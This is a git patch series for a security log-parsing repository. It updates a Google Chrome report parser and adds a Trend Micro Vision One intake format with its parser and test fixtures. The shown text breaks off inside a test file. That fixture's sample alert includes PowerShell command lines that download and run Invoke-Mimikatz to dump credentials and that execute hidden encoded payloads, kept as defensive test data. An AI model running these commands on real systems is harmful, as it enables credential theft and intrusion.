json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' - set: event.type: ["change"] diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index e0e145d54..6567eebf1 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -28,12 +28,18 @@ } }, "device": { - "id": "0x2", + "manufacturer": "Linux Foundation", "model": { - "identifier": "S5NXNZ00A000000", + "identifier": "0x2", "name": "2.0 root hub" } }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, "network": { "application": "chrome" }, diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index ecbf27de3..990b7f47c 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -27,9 +27,10 @@ "id": "C01x7c000" } }, - "device": { - "model": { - "identifier": "S5NXNZ00A000000" + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" } }, "network": { From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 12:27:34 +0100 Subject: [PATCH 054/150] Fix smart desc --- .../_meta/smart-descriptions.json | 32 +++++++++++++++++-- 1 file changed, 30 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 66d518071..81622bd9b 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -352,7 +352,7 @@ ] }, { - "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", "conditions": [ { "field": "network.application", @@ -367,11 +367,14 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" } ] }, { - "value": "The user on device model {device.model.name} log in due to {event.reason}", + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", "conditions": [ { "field": "network.application", @@ -386,6 +389,31 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" } ] }, From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:48:10 +0200 Subject: [PATCH 055/150] Add format for Trend Micro Vision One --- .../trend-micro-vision-one/CHANGELOG.md | 8 ++ .../trend-micro-vision-one/_meta/fields.yml | 29 +++++++ .../trend-micro-vision-one/_meta/logo.png | Bin 0 -> 10452 bytes .../trend-micro-vision-one/_meta/manifest.yml | 9 ++ .../_meta/smart-descriptions.json | 0 .../trend-micro-vision-one/ingest/parser.yml | 79 ++++++++++++++++++ .../tests/test_process.json | 66 +++++++++++++++ .../tests/test_registry.json | 72 ++++++++++++++++ 8 files changed, 263 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml new file mode 100644 index 000000000..f18d3cb5d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -0,0 +1,29 @@ +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157 GIT binary patch literal 10452 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 wM>ZBJ6Qe~@DrfdBvi literal 0 HcmV?d00001 diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..c0121a28d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,9 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +name: Trend Micro Vision One +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..e69de29bb diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..38a31dd29 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -0,0 +1,79 @@ +name: trend-micro-vision-one +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.model.workbenchLink}}" + + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + # @todo should be along with registry.data.type to REG_SZ + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json new file mode 100644 index 000000000..5eca6b2ea --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -0,0 +1,66 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 